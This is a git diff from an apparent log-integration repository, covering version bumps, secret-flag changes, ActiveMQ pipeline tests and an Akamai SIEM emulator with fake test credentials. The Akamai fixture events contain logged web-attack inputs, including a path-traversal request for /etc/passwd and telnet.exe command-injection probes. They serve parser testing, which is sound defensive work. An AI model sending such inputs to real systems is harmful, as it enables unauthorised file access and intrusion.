k8s.io/apiextensions-apiserver v0.29.0 h1:0VuspFG7Hj+SxyF/Z/2T0uFbI5gb5LRgEyUVE3Q4lV0= k8s.io/apiextensions-apiserver v0.29.0/go.mod h1:TKmpy3bTS0mr9pylH0nOt/QzQRrW7/h7yLdRForMZwc= -k8s.io/apimachinery v0.29.1 h1:KY4/E6km/wLBguvCZv8cKTeOwwOBqFNjwJIdMkMbbRc= -k8s.io/apimachinery v0.29.1/go.mod h1:6HVkd1FwxIagpYrHSwJlQqZI3G9LfYWRPAkUvLnXTKU= -k8s.io/cli-runtime v0.29.1 h1:By3WVOlEWYfyxhGko0f/IuAOLQcbBSMzwSaDren2JUs= -k8s.io/cli-runtime v0.29.1/go.mod h1:vjEY9slFp8j8UoMhV5AlO8uulX9xk6ogfIesHobyBDU= -k8s.io/client-go v0.29.1 h1:19B/+2NGEwnFLzt0uB5kNJnfTsbV8w6TgQRz9l7ti7A= -k8s.io/client-go v0.29.1/go.mod h1:TDG/psL9hdet0TI9mGyHJSgRkW3H9JZk2dNEUS7bRks= +k8s.io/apimachinery 
v0.29.3 h1:2tbx+5L7RNvqJjn7RIuIKu9XTsIZ9Z5wX2G22XAa5EU= +k8s.io/apimachinery v0.29.3/go.mod h1:hx/S4V2PNW4OMg3WizRrHutyB5la0iCUbZym+W0EQIU= +k8s.io/cli-runtime v0.29.3 h1:r68rephmmytoywkw2MyJ+CxjpasJDQY7AGc3XY2iv1k= +k8s.io/cli-runtime v0.29.3/go.mod h1:aqVUsk86/RhaGJwDhHXH0jcdqBrgdF3bZWk4Z9D4mkM= +k8s.io/client-go v0.29.3 h1:R/zaZbEAxqComZ9FHeQwOh3Y1ZUs7FaHKZdQtIc2WZg= +k8s.io/client-go v0.29.3/go.mod h1:tkDisCvgPfiRpxGnOORfkljmS+UrW+WtXAy2fTvXJB0= k8s.io/component-base v0.29.0 h1:T7rjd5wvLnPBV1vC4zWd/iWRbV8Mdxs+nGaoaFzGw3s= k8s.io/component-base v0.29.0/go.mod h1:sADonFTQ9Zc9yFLghpDpmNXEdHyQmFIGbiuZbqAXQ1M= k8s.io/klog/v2 v2.110.1 h1:U/Af64HJf7FcwMcXyKm2RPM22WZzyR7OSpYj5tg3cL0= diff --git a/links_table.yml b/links_table.yml index 919d6eb5b58..423a2637f58 100644 --- a/links_table.yml +++ b/links_table.yml @@ -13,6 +13,7 @@ links: filebeat-input-filestream-parsers: https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-filestream.html#_parsers fleet-overview: https://www.elastic.co/guide/en/fleet/current/fleet-overview.html getting-started-observability: https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html + logstash-monitoring-ea: https://www.elastic.co/guide/en/logstash/current/monitoring-with-ea.html kibana-introduction: https://www.elastic.co/guide/en/kibana/current/introduction.html kibana-security-settings: https://www.elastic.co/guide/en/kibana/current/security-settings-kb.html kibana-logging-configuration: https://www.elastic.co/guide/en/kibana/current/logging-configuration.html diff --git a/packages/1password/changelog.yml b/packages/1password/changelog.yml index e224e1d1dae..3ac92f2f347 100644 --- a/packages/1password/changelog.yml +++ b/packages/1password/changelog.yml 
@@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.27.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.26.1" changes: - description: Changed owners diff --git a/packages/1password/manifest.yml b/packages/1password/manifest.yml index 01a514e805d..ce288a75d6c 100644 --- a/packages/1password/manifest.yml +++ b/packages/1password/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: 1password title: "1Password" -version: "1.26.1" +version: "1.27.0" description: Collect logs from 1Password with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - credential_management conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/1password-signinattempts-screenshot.png title: Sign-in attempts @@ -55,6 +55,7 @@ policy_templates: Bearer Token, e.g. "eyJhbGciO..." show_user: true required: true + secret: true - name: http_client_timeout type: text title: HTTP Client Timeout diff --git a/packages/activemq/_dev/build/docs/README.md b/packages/activemq/_dev/build/docs/README.md index 78b6e9c5250..7b6c2f2363b 100644 --- a/packages/activemq/_dev/build/docs/README.md +++ b/packages/activemq/_dev/build/docs/README.md 
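Review bot: The Kibana constraint raised from `^8.7.1` to `^8.12.0` in the `@@ -9,7 +9,7 @@` hunk of packages/1password/manifest.yml is not mentioned anywhere in the 1.27.0 changelog entry in this same diff, which only says "Set sensitive values as secret"; since users on an older stack will no longer be offered this version, the entry should record the new minimum, e.g. `- description: Set sensitive values as secret (requires Kibana 8.12.0 or later).`. The constraint bump appears to exist because of the `secret: true` added to the bearer-token variable in the `@@ -55,6 +55,7 @@` hunk — the activemq changelog later in this diff notes that secrets are supported from 8.12 and had to be disabled for older stacks due to errors — so stating the dependency explicitly would help the next maintainer who is tempted to relax it. The changelog description speaks of sensitive values in the plural while only the one variable gains the flag in the visible hunk; if the manifest has other credential-type inputs outside this hunk, they should carry the same `secret: true` so a token is never left in plaintext policy for one input but not another.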
@@ -84,7 +84,9 @@ After the integration is successfully configured, clicking on the Assets tab of ## Troubleshooting -If `host.ip` appears conflicted under the `log-*` or `metrics-*` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the indices of the `Audit`, `Log`, `Broker`, `Queue` and `Topic` data streams. +If `host.ip` is shown conflicted under ``logs-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Audit`` and ``Log`` data stream's indices. + +If `host.ip` is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds-reindex.html) the ``Broker``, ``Queue`` and ``Topic`` data stream's indices. ## Logs diff --git a/packages/activemq/changelog.yml b/packages/activemq/changelog.yml index 4c51a265703..0cd8019260c 100644 --- a/packages/activemq/changelog.yml +++ b/packages/activemq/changelog.yml 
@@ -1,4 +1,34 @@ # newer versions go on top +- version: 1.2.1 + changes: + - description: Add pipeline tests for Broker, Queue and Topic data streams. + type: enhancement + link: https://github.com/elastic/integrations/pull/9423 +- version: 1.2.0 + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: 1.1.1 + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: 1.1.0 + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 +- version: 1.0.0 + changes: + - description: Make ActiveMQ GA. + type: enhancement + link: https://github.com/elastic/integrations/pull/8939 +- version: 0.16.1 + changes: + - description: Update link to the correct reindexing procedure. + type: bugfix + link: https://github.com/elastic/integrations/pull/9021 - version: 0.16.0 changes: - description: Update README to use documentation guidelines. diff --git a/packages/activemq/data_stream/broker/_dev/test/pipeline/test-broker.json b/packages/activemq/data_stream/broker/_dev/test/pipeline/test-broker.json new file mode 100644 index 00000000000..3c1d9915853 --- /dev/null +++ b/packages/activemq/data_stream/broker/_dev/test/pipeline/test-broker.json 
@@ -0,0 +1,41 @@ +{ + "events": [ + { + "activemq": { + "broker": { + "name": "localhost", + "mbean": "org.apache.activemq:brokerName=localhost,type=Broker", + "messages": { + "dequeue": { + "count": 5 + }, + "count": 1, + "enqueue": { + "count": 19 + } + }, + "memory": { + "temp": { + "pct": 1 + }, + "broker": { + "pct": 2 + }, + "store": { + "pct": 4 + } + }, + "connections": { + "count": 3 + }, + "producers": { + "count": 5 + }, + "consumers": { + "count": 5 + } + } + } + } + ] +} \ No newline at end of file diff --git a/packages/activemq/data_stream/broker/_dev/test/pipeline/test-broker.json-expected.json b/packages/activemq/data_stream/broker/_dev/test/pipeline/test-broker.json-expected.json new file mode 100644 index 00000000000..9864596648c --- /dev/null +++ b/packages/activemq/data_stream/broker/_dev/test/pipeline/test-broker.json-expected.json @@ -0,0 +1,53 @@ +{ + "expected": [ + { + "activemq": { + "broker": { + "connections": { + "count": 3 + }, + "consumers": { + "count": 5 + }, + "mbean": "org.apache.activemq:brokerName=localhost,type=Broker", + "memory": { + "broker": { + "pct": 2 + }, + "store": { + "pct": 4 + }, + "temp": { + "pct": 1 + } + }, + "messages": { + "count": 1, + "dequeue": { + "count": 5 + }, + "enqueue": { + "count": 19 + } + }, + "name": "localhost", + "producers": { + "count": 5 + } + } + }, + "ecs": { + "version": "8.5.1" + }, + "event": { + "category": [ + "web" + ], + "kind": "metric", + "type": [ + "info" + ] + } + } + ] +} \ No newline at end of file diff --git a/packages/activemq/data_stream/broker/_dev/test/pipeline/test-common-config.yml b/packages/activemq/data_stream/broker/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..e071d397ddf --- /dev/null +++ b/packages/activemq/data_stream/broker/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,2 @@ +dynamic_fields: + "event.ingested": ".*" 
diff --git a/packages/activemq/data_stream/queue/_dev/test/pipeline/test-common-config.yml b/packages/activemq/data_stream/queue/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..e071d397ddf --- /dev/null +++ b/packages/activemq/data_stream/queue/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,2 @@ +dynamic_fields: + "event.ingested": ".*" diff --git a/packages/activemq/data_stream/queue/_dev/test/pipeline/test-queue.json b/packages/activemq/data_stream/queue/_dev/test/pipeline/test-queue.json new file mode 100644 index 00000000000..6649c188d6d --- /dev/null +++ b/packages/activemq/data_stream/queue/_dev/test/pipeline/test-queue.json @@ -0,0 +1,49 @@ +{ + "events": [ + { + "activemq": { + "queue": { + "name": "elastic", + "mbean": "org.apache.activemq:brokerName=localhost,destinationName=elastic,destinationType=Queue,type=Broker", + "memory": { + "broker": { + "pct": 2 + } + }, + "size": 2, + "consumers": { + "count": 5 + }, + "messages": { + "inflight": { + "count": 2 + }, + "expired": { + "count": 1 + }, + "enqueue": { + "time": { + "avg": 5, + "min": 5, + "max": 5 + }, + "count": 5 + }, + "dequeue": { + "count": 2 + }, + "size": { + "avg": 1 + }, + "dispatch": { + "count": 2 + } + }, + "producers": { + "count": 5 + } + } + } + } + ] +} \ No newline at end of file diff --git a/packages/activemq/data_stream/queue/_dev/test/pipeline/test-queue.json-expected.json b/packages/activemq/data_stream/queue/_dev/test/pipeline/test-queue.json-expected.json new file mode 100644 index 00000000000..600e98edddc --- /dev/null +++ b/packages/activemq/data_stream/queue/_dev/test/pipeline/test-queue.json-expected.json 
@@ -0,0 +1,61 @@ +{ + "expected": [ + { + "activemq": { + "queue": { + "consumers": { + "count": 5 + }, + "mbean": "org.apache.activemq:brokerName=localhost,destinationName=elastic,destinationType=Queue,type=Broker", + "memory": { + "broker": { + "pct": 2 + } + }, + "messages": { + "dequeue": { + "count": 2 + }, + "dispatch": { + "count": 2 + }, + "enqueue": { + "count": 5, + "time": { + "avg": 5, + "max": 5, + "min": 5 + } + }, + "expired": { + "count": 1 + }, + "inflight": { + "count": 2 + }, + "size": { + "avg": 1 + } + }, + "name": "elastic", + "producers": { + "count": 5 + }, + "size": 2 + } + }, + "ecs": { + "version": "8.5.1" + }, + "event": { + "category": [ + "web" + ], + "kind": "metric", + "type": [ + "info" + ] + } + } + ] +} \ No newline at end of file diff --git a/packages/activemq/data_stream/topic/_dev/test/pipeline/test-common-config.yml b/packages/activemq/data_stream/topic/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..e071d397ddf --- /dev/null +++ b/packages/activemq/data_stream/topic/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,2 @@ +dynamic_fields: + "event.ingested": ".*" diff --git a/packages/activemq/data_stream/topic/_dev/test/pipeline/test-topic.json b/packages/activemq/data_stream/topic/_dev/test/pipeline/test-topic.json new file mode 100644 index 00000000000..754ddb69d79 --- /dev/null +++ b/packages/activemq/data_stream/topic/_dev/test/pipeline/test-topic.json 
@@ -0,0 +1,48 @@ +{ + "events": [ + { + "activemq": { + "topic": { + "consumers": { + "count": 5 + }, + "memory": { + "broker": { + "pct": 2 + } + }, + "mbean": "org.apache.activemq:brokerName=localhost,destinationName=Test,destinationType=Topic,type=Broker", + "messages": { + "enqueue": { + "count": 5, + "time": { + "avg": 5, + "max": 5, + "min": 5 + } + }, + "size": { + "avg": 2 + }, + "dispatch": { + "count": 1 + }, + "inflight": { + "count": 2 + }, + "expired": { + "count": 2 + }, + "dequeue": { + "count": 5 + } + }, + "name": "Test", + "producers": { + "count": 5 + } + } + } + } + ] +} \ No newline at end of file diff --git a/packages/activemq/data_stream/topic/_dev/test/pipeline/test-topic.json-expected.json b/packages/activemq/data_stream/topic/_dev/test/pipeline/test-topic.json-expected.json new file mode 100644 index 00000000000..1ab3eac356d --- /dev/null +++ b/packages/activemq/data_stream/topic/_dev/test/pipeline/test-topic.json-expected.json @@ -0,0 +1,60 @@ +{ + "expected": [ + { + "activemq": { + "topic": { + "consumers": { + "count": 5 + }, + "mbean": "org.apache.activemq:brokerName=localhost,destinationName=Test,destinationType=Topic,type=Broker", + "memory": { + "broker": { + "pct": 2 + } + }, + "messages": { + "dequeue": { + "count": 5 + }, + "dispatch": { + "count": 1 + }, + "enqueue": { + "count": 5, + "time": { + "avg": 5, + "max": 5, + "min": 5 + } + }, + "expired": { + "count": 2 + }, + "inflight": { + "count": 2 + }, + "size": { + "avg": 2 + } + }, + "name": "Test", + "producers": { + "count": 5 + } + } + }, + "ecs": { + "version": "8.5.1" + }, + "event": { + "category": [ + "web" + ], + "kind": "metric", + "type": [ + "info" + ] + } + } + ] +} \ No newline at end of file diff --git a/packages/activemq/docs/README.md b/packages/activemq/docs/README.md index b88968da1eb..5f3a1154ce2 100644 --- a/packages/activemq/docs/README.md +++ b/packages/activemq/docs/README.md 
@@ -84,7 +84,9 @@ After the integration is successfully configured, clicking on the Assets tab of ## Troubleshooting -If `host.ip` appears conflicted under the `log-*` or `metrics-*` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the indices of the `Audit`, `Log`, `Broker`, `Queue` and `Topic` data streams. +If `host.ip` is shown conflicted under ``logs-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Audit`` and ``Log`` data stream's indices. + +If `host.ip` is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds-reindex.html) the ``Broker``, ``Queue`` and ``Topic`` data stream's indices. ## Logs diff --git a/packages/activemq/manifest.yml b/packages/activemq/manifest.yml index 2c9c074f0c7..5364305ec91 100644 --- a/packages/activemq/manifest.yml +++ b/packages/activemq/manifest.yml @@ -1,6 +1,6 @@ name: activemq title: ActiveMQ -version: "0.16.0" +version: "1.2.1" description: Collect logs and metrics from ActiveMQ instances with Elastic Agent. type: integration icons: @@ -8,13 +8,13 @@ icons: title: activemq size: 32x32 type: image/svg+xml -format_version: "3.0.0" +format_version: "3.0.2" categories: - message_queue - observability conditions: kibana: - version: ^8.8.0 + version: ^8.12.0 elastic: subscription: basic screenshots: @@ -79,6 +79,7 @@ policy_templates: multi: false required: true show_user: true + secret: true description: Password for authentication of ActiveMQ instance. default: admin - name: ssl diff --git a/packages/akamai/_dev/deploy/docker/Dockerfile b/packages/akamai/_dev/deploy/docker/Dockerfile new file mode 100644 index 00000000000..b5948e258c5 --- /dev/null 
+++ b/packages/akamai/_dev/deploy/docker/Dockerfile @@ -0,0 +1,5 @@ +FROM golang:1.21 + +RUN go install github.com/andrewkroh/go-examples/akamai-siem-emulator@80b18780e7 + +CMD akamai-siem-emulator -h \ No newline at end of file diff --git a/packages/akamai/_dev/deploy/docker/docker-compose.yml b/packages/akamai/_dev/deploy/docker/docker-compose.yml index 6f0dc33289a..d3c835666cc 100644 --- a/packages/akamai/_dev/deploy/docker/docker-compose.yml +++ b/packages/akamai/_dev/deploy/docker/docker-compose.yml @@ -1,14 +1,15 @@ version: '2.3' services: - akamai: - image: docker.elastic.co/observability/stream:v0.6.1 + akamai-siem-emulator: + hostname: akamai-siem-emulator + build: + context: . + dockerfile: Dockerfile ports: - - 8080 - volumes: - - ./files:/files:ro - environment: - PORT: 8080 + - 9903 command: - - http-server - - --addr=:8080 - - --config=/files/config.yml + - akamai-siem-emulator + - -http=:9903 + - -access-token=at-6b8c7217-8748-490d-b0f5-bfeb72b2e7cd + - -client-secret=cs-0d15cfd9-764a-48e6-a822-22756180ddb8 + - -client-token=ct-f625f0b8-9c8f-44ce-8250-eaf17bc93051 diff --git a/packages/akamai/_dev/deploy/docker/files/config.yml b/packages/akamai/_dev/deploy/docker/files/config.yml deleted file mode 100644 index 98e34ef04eb..00000000000 --- a/packages/akamai/_dev/deploy/docker/files/config.yml +++ /dev/null 
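Review bot: The last line `CMD akamai-siem-emulator -h` is the shell form, so the emulator runs as a child of `/bin/sh -c` and stop signals from the container runtime reach the shell rather than the Go binary; the exec form `CMD ["akamai-siem-emulator", "-h"]` avoids that. The default command only prints usage and docker-compose.yml in this same commit replaces it with the real arguments, which is worth stating in the file: `# Default CMD only prints usage; docker-compose.yml in this directory supplies the real arguments.` Pinning `go install` to commit `80b18780e7` rather than a branch keeps the test image reproducible, so keep a commit pin when this is bumped.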
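Review bot: The `-access-token`, `-client-secret` and `-client-token` values in `command:` are duplicated verbatim in `test-emulator-config.yml` (the `@@ -0,0 +1,16 @@` hunk later in this diff) and nothing ties the two copies together, so an edit to one side will presumably make the emulator reject the agent's signed requests and fail the system test with no obvious cause. A comment on the `command:` list such as `# Fixed fake credentials for the emulator; must match data_stream/siem/_dev/test/system/test-emulator-config.yml` would also tell whoever triages a secret-scanner hit that these are not real Akamai EdgeGrid credentials. The `hostname: akamai-siem-emulator` and port `9903` are coupled to `api_host` in that same config and belong in the same comment.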
@@ -1,38 +0,0 @@ -rules: - # Initial iteration. - - path: /siem/v1/configs/aaaa - methods: ["GET"] - request_headers: - authorization: ["EG1-HMAC-SHA256 client_token=qwerasdf;access_token=abcd;timestamp=\\d{8}T(\\d{2}:){2}\\d{2}\\+0000;nonce=[a-f0-9]{8}-([a-f0-9]{4}-){3}[a-f0-9]{12};signature=.*"] - query_params: - from: "{from:.*}" - to: "{to:.*}" - responses: - - status_code: 200 - body: |- - {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"14227","policyId":"qik1_26545","ruleActions":"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d","ruleData":"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX ","ruleMessages":"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 ","ruleSelectors":"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b","ruleTags":"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R ","ruleVersions":"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d","rules":"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ"},"geo":{"asn":"14618","city":"ASHBURN","continent":"288","country":"US","regionCode":"VA"},"httpMessage":{"bytes":"266","host":"www.hmapi.com","method":"GET","path":"/","port":"80","protocol":"HTTP/1.1","query":"option=com_jce%20telnet.exe","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"1158db1758e37bfe67b7c09","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150","start":"1491303422","status":"200"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botSc
ore":"100","responseSegment":"3"}} - {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"6724","policyId":"scoe_5426","ruleActions":"QUxFUlQ;REVOWQ==","ruleData":"YWxlcnQo;Y3VybA==","ruleMessages":"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=","ruleSelectors":"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=","ruleTags":"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND","ruleVersions":";","rules":"OTUwMDA0;OTkwMDEx"},"geo":{"asn":"12271","city":"NEWYORK","continent":"NA","country":"US","regionCode":"NY"},"httpMessage":{"bytes":"34523","host":"www.example.com","method":"POST","path":"/examples/1/","port":"80","protocol":"http/2","query":"a%3D..%2F..%2F..%2Fetc%2Fpasswd","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"2ab418ac8515f33","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml","start":"1470923133.026","status":"301","tls": "TLSv1.2"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} - {"total":2,"offset":"offset1","limit":2} - # Second iteration. 
- - path: /siem/v1/configs/aaaa - methods: ["GET"] - request_headers: - authorization: ["EG1-HMAC-SHA256 client_token=qwerasdf;access_token=abcd;timestamp=\\d{8}T(\\d{2}:){2}\\d{2}\\+0000;nonce=[a-f0-9]{8}-([a-f0-9]{4}-){3}[a-f0-9]{12};signature=.*"] - query_params: - offset: "offset1" - responses: - - status_code: 200 - body: |- - {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"14227","policyId":"qik1_26545","ruleActions":"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d","ruleData":"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX ","ruleMessages":"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 ","ruleSelectors":"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b","ruleTags":"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R ","ruleVersions":"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d","rules":"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ"},"geo":{"asn":"14618","city":"ASHBURN","continent":"288","country":"US","regionCode":"VA"},"httpMessage":{"bytes":"266","host":"www.hmapi.com","method":"GET","path":"/","port":"80","protocol":"HTTP/1.1","query":"option=com_jce%20telnet.exe","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"3158db1758e37bfe67b7c09","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150","start":"1491303422","status":"200"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} - 
{"total":1,"offset":"offset2"} - # Final iteration. - - path: /siem/v1/configs/aaaa - methods: ["GET"] - request_headers: - authorization: ["EG1-HMAC-SHA256 client_token=qwerasdf;access_token=abcd;timestamp=\\d{8}T(\\d{2}:){2}\\d{2}\\+0000;nonce=[a-f0-9]{8}-([a-f0-9]{4}-){3}[a-f0-9]{12};signature=.*"] - query_params: - offset: "offset2" - responses: - - status_code: 200 - body: |- - {"total":0,"offset":"offset2"} diff --git a/packages/akamai/changelog.yml b/packages/akamai/changelog.yml index fd05c044219..639790bd9f0 100644 --- a/packages/akamai/changelog.yml +++ b/packages/akamai/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: "2.23.2" + changes: + - description: Handle HTTP headers without values. + type: bugfix + link: https://github.com/elastic/integrations/pull/9486 +- version: "2.23.1" + changes: + - description: Fix errors processing empty userRiskData.{risk,trust,general} values. + type: bugfix + link: https://github.com/elastic/integrations/pull/9483 +- version: "2.23.0" + changes: + - description: Set sensitive values as secret and add missing mappings. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 +- version: "2.22.0" + changes: + - description: Require 8.11.0 or greater because it contains necessary fixes to the Elastic Agent. + type: bugfix + link: https://github.com/elastic/integrations/pull/9042 - version: "2.21.1" changes: - description: Changed owners diff --git a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log index 838d5e98cff..8ceb2679c14 100644 --- a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log +++ b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log 
@@ -1,3 +1,4 @@ {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"14227","policyId":"qik1_26545","ruleActions":"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d","ruleData":"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX ","ruleMessages":"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 ","ruleSelectors":"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b","ruleTags":"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R ","ruleVersions":"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d","rules":"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ"},"geo":{"asn":"14618","city":"ASHBURN","continent":"288","country":"US","regionCode":"VA"},"httpMessage":{"bytes":"266","host":"www.hmapi.com","method":"GET","path":"/","port":"80","protocol":"HTTP/1.1","query":"option=com_jce%20telnet.exe","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"1158db1758e37bfe67b7c09","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150","start":"1491303422","status":"200"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} +{"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"14227","policyId":"qik1_26545","ruleActions":"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d","ruleData":"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX 
